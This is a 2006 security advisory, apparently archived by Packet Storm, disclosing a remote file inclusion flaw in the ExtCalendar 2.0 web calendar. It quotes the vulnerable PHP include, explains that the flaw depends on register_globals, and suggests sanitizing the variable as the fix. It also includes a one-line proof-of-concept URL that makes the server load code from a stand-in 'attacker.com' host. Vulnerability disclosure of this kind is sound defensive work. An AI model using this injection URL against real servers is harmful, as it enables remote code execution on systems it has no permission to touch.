Echo Security Advisory 2006.36

2006-07-09T00:00:00
ID PACKETSTORM:48097
Type packetstorm
Reporter Echo Security
Modified 2006-07-09T00:00:00

Description

                                        
                                            `ECHO.OR.ID  
ECHO_ADV_36$2006  
  
---------------------------------------------------------------------------  
[ECHO_ADV_36$2006] ExtCalendar <== v2.0 Remote File Include Vulnerabilities  
---------------------------------------------------------------------------  
  
Author : Ahmad Maulana a.k.a Matdhule  
Date : July 07th 2006  
Location : Indonesia, Jakarta  
Web : http://advisories.echo.or.id/adv/adv36-matdhule-2006.txt  
Critical Lvl : Highly critical  
Impact : System access  
Where : From Remote  
---------------------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
ExtCalendar  
  
Application : ExtCalendar  
version : 2.0  
URL : http://extcal.sourceforge.net/  
Description :  
  
ExtCalendar is a powerful multi-user web-based calendar application.   
Features include Multi-Languages, Themes, Recurrent Events, Categories,   
Users and Groups management, Environment and General Settings, Template Configuration, Product Updates.  
  
---------------------------------------------------------------------------  
  
Vulnerability:  
~~~~~~~~~~~~~~~  
  
in folder com_extcalendar we found vulnerability script extcalendar.php.  
  
-----------------------extcalendar.php----------------------  
....  
<?php  
global $mosConfig_absolute_path;  
require_once( $mosConfig_absolute_path."/components/com_extcalendar/config.inc.php" );  
require_once( $CONFIG_EXT['LIB_DIR']."mail.inc.php" );  
?>  
...  
----------------------------------------------------------  
  
Variables $mosConfig_absolute_path are not properly sanitized. When register_globals=on  
and allow_fopenurl=on an attacker can exploit this vulnerability with a  
simple php injection script.  
  
Proof Of Concept:  
~~~~~~~~~~~~~~~~  
  
http://[target]/[path]/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://attacker.com/evil.txt?  
  
Solution:  
~~~~~~~~  
  
sanitize variabel $mosConfig_absolute_path in extcalendar.php  
  
  
---------------------------------------------------------------------------  
Shoutz:  
~~~~~~  
~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :)  
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous  
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama  
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com  
~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net  
---------------------------------------------------------------------------  
Contact:  
~~~~~~~  
  
matdhule[at]gmail[dot]com  
  
-------------------------------- [ EOF ] ----------------------------------  
`